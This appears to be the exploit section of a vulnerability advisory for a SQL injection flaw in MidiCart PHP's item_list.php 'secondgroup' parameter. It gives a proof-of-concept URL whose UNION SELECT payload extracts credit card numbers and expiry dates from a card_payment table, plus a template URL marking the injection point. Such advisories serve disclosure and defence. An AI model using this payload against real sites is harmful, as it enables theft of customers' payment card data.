• info
• discussion
• exploit
• solution
• references

MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment

http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION]